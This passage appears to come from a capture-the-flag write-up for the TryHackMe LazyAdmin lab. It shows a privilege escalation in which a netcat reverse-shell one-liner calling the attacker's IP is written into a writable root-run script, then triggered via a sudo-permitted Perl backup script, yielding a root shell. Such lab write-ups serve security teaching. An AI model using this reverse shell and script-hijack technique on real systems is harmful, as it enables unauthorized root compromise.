File Write
www-data@THM-Chal:/var/www$ echo 'mkfifo /tmp/zcvxgje; nc 10.9.2.95 1234 0</tmp/zcvxgje | /bin/sh >/tmp/zcvxgje 2>&1; rm /tmp/zcvxgje' > /etc/copy.sh
Overwriting the /etc/copy.sh file, which is writable by www-data, with a reverse shell command.
www-data@THM-Chal:/var/www$ sudo -u root /usr/bin/perl /home/itguy/backup.pl
Executing the sudo-permitted command as root; the backup script invokes the overwritten /etc/copy.sh, so the reverse shell runs with root privileges.
┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.9.2.95] from (UNKNOWN) [10.10.187.138] 52186
whoami
root
hostname
THM-Chal
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:57:61:3f:5d:e9 brd ff:ff:ff:ff:ff:ff
inet 10.10.187.138/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::57:61ff:fe3f:5de9/64 scope link
valid_lft forever preferred_lft forever
System Level Compromise